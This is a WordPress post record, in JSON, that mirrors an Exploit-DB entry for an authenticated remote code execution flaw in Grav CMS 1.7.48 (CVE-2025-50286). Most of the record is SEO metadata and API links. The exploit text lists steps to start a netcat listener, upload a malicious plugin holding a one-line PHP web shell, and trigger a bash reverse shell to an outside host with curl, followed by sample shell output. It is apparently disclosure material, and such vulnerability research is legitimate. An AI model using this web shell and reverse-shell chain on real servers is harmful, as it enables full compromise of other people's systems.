{"id":10367,"date":"2025-08-11T11:49:30","date_gmt":"2025-08-11T11:49:30","guid":{"rendered":"http:\/\/localhost\/?p=10367"},"modified":"2025-08-11T11:49:30","modified_gmt":"2025-08-11T11:49:30","slug":"grav-cms-1748-remote-code-execution-rce","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=10367","title":{"rendered":"Grav CMS 1.7.48 – Remote Code Execution (RCE)_EDB-ID:52402"},"content":{"rendered":"

{“lastseen”:”2025-08-11T16:26:28″,”description”:”Exploit Title: Grav CMS 1.7.48 – Remote Code Execution (RCE) Date: 2025-08-07 Exploit Author: binneko (https:\/\/github.com\/binneko)…”,”published”:”2025-08-11T00:00:00″,”modified”:”2025-08-11T00:00:00″,”type”:”exploitdb”,”title”:”Grav CMS 1.7.48 – Remote Code Execution (RCE)”,”source”:””,”references”:””,”id”:”EDB-ID:52402″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-50286″],”sourceData”:”# Exploit Title: Grav CMS 1.7.48 – Remote Code Execution (RCE)\\r\\n# Date: 2025-08-07\\r\\n# Exploit Author: binneko (https:\/\/github.com\/binneko)\\r\\n# Vendor Homepage: https:\/\/getgrav.org\/\\r\\n# Software Link: https:\/\/github.com\/getgrav\/grav\/releases\/tag\/1.7.48\\r\\n# Version: Grav CMS v1.7.48 \/ Admin Plugin v1.10.48\\r\\n# Tested on: Debian 11, Apache2, PHP 7.4\\r\\n# CVE: CVE-2025-50286\\r\\n\\r\\n# Description:\\r\\nGrav CMS v1.7.48 with Admin Plugin v1.10.48 is vulnerable to Authenticated Remote Code Execution (RCE)\\r\\nthrough the \\”Direct Install\\” feature in the admin panel. An authenticated administrator can upload\\r\\na malicious plugin that contains arbitrary PHP code, which will be executed by the server upon access.\\r\\n\\r\\n# Steps to Reproduce:\\r\\n\\r\\n1. Start a listener on your attack machine:\\r\\n nc -lvnp 4444\\r\\n\\r\\n2. Log in to the Grav Admin Panel as an administrator:\\r\\n https:\/\/\\u003ctarget\\u003e\/admin\\r\\n\\r\\n3. Navigate to:\\r\\n Tools \u2192 Direct Install\\r\\n\\r\\n4. Upload a ZIP archive containing the following structure:\\r\\n\\r\\n evilplugin\/\\r\\n \u251c\u2500\u2500 evilplugin.php # Contains: \\u003c?php shell_exec($_GET[‘cmd’]); ?\\u003e\\r\\n \u2514\u2500\u2500 blueprints.yaml # Minimal content to pass plugin validation\\r\\n\\r\\n5. Access the uploaded plugin\u2019s endpoint and trigger the payload:\\r\\n\\r\\n curl –get –data-urlencode \\”cmd=bash -c ‘bash -i \\u003e\\u0026 \/dev\/tcp\/host.docker.internal\/4444 0\\u003e\\u00261’\\” http:\/\/\\u003ctarget\\u003e\/\\r\\n\\r\\n6. Observe the reverse shell:\\r\\n\\r\\n $ nc -lvnp 4444\\r\\n Listening on 0.0.0.0 4444\\r\\n Connection received on \\u003ctarget-ip\\u003e\\r\\n www-data@target:\/var\/www\/html$ whoami\\r\\n www-data\\r\\n\\r\\n# Notes:\\r\\n- Authentication is required (admin-level).\\r\\n- The vulnerability exists due to insufficient validation in the plugin upload feature (`\/admin\/tools\/direct-install`).\\r\\n- Successful exploitation may result in full system compromise.\\r\\n\\r\\n# References:\\r\\n- https:\/\/github.com\/getgrav\/grav\\r\\n- https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2025-50286\\r\\n\\r\\n# Disclaimer:\\r\\nThis exploit is provided for educational and research purposes only.”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52402″,”cvss”:{“score”:8.1,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:H\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52402″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-08-11T16:26:28″,”description”:”Exploit Title: Grav CMS 1.7.48 – Remote Code Execution (RCE) Date: 2025-08-07 Exploit Author: binneko (https:\/\/github.com\/binneko)…”,”published”:”2025-08-11T00:00:00″,”modified”:”2025-08-11T00:00:00″,”type”:”exploitdb”,”title”:”Grav CMS 1.7.48 – Remote Code Execution (RCE)”,”source”:””,”references”:””,”id”:”EDB-ID:52402″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-50286″],”sourceData”:”# Exploit Title:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,52,12,40,15,13,7,11,5],"class_list":["post-10367","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-81","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nGrav CMS 1.7.48 - Remote Code Execution (RCE)_EDB-ID:52402 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=10367\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Grav CMS 1.7.48 - Remote Code Execution (RCE)_EDB-ID:52402 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-08-11T16:26:28″,”description”:”Exploit Title: Grav CMS 1.7.48 – Remote Code Execution (RCE) Date: 2025-08-07 Exploit Author: binneko (https:\/\/github.com\/binneko)…”,”published”:”2025-08-11T00:00:00″,”modified”:”2025-08-11T00:00:00″,”type”:”exploitdb”,”title”:”Grav CMS 1.7.48 – Remote Code Execution (RCE)”,”source”:””,”references”:””,”id”:”EDB-ID:52402″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-50286″],”sourceData”:”# Exploit Title:...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=10367\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-11T11:49:30+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10367#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10367\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Grav CMS 1.7.48 – Remote Code Execution (RCE)_EDB-ID:52402\",\"datePublished\":\"2025-08-11T11:49:30+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10367\"},\"wordCount\":514,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.1\",\"exploit\",\"exploitdb\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=10367#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10367\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10367\",\"name\":\"Grav CMS 1.7.48 - Remote Code Execution (RCE)_EDB-ID:52402 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-08-11T11:49:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10367#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=10367\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10367#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Grav CMS 1.7.48 – Remote Code Execution (RCE)_EDB-ID:52402\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Grav CMS 1.7.48 - Remote Code Execution (RCE)_EDB-ID:52402 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=10367","og_locale":"en_US","og_type":"article","og_title":"Grav CMS 1.7.48 - Remote Code Execution (RCE)_EDB-ID:52402 - zero redgem","og_description":"{“lastseen”:”2025-08-11T16:26:28″,”description”:”Exploit Title: Grav CMS 1.7.48 – Remote Code Execution (RCE) Date: 2025-08-07 Exploit Author: binneko (https:\/\/github.com\/binneko)…”,”published”:”2025-08-11T00:00:00″,”modified”:”2025-08-11T00:00:00″,”type”:”exploitdb”,”title”:”Grav CMS 1.7.48 – Remote Code Execution (RCE)”,”source”:””,”references”:””,”id”:”EDB-ID:52402″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-50286″],”sourceData”:”# Exploit Title:...","og_url":"https:\/\/zero.redgem.net\/?p=10367","og_site_name":"zero redgem","article_published_time":"2025-08-11T11:49:30+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=10367#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=10367"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Grav CMS 1.7.48 – Remote Code Execution (RCE)_EDB-ID:52402","datePublished":"2025-08-11T11:49:30+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=10367"},"wordCount":514,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.1","exploit","exploitdb","HIGH","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=10367#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=10367","url":"https:\/\/zero.redgem.net\/?p=10367","name":"Grav CMS 1.7.48 - Remote Code Execution (RCE)_EDB-ID:52402 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-08-11T11:49:30+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=10367#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=10367"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=10367#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Grav CMS 1.7.48 – Remote Code Execution (RCE)_EDB-ID:52402"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/10367","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10367"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/10367\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10367"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10367"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10367"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}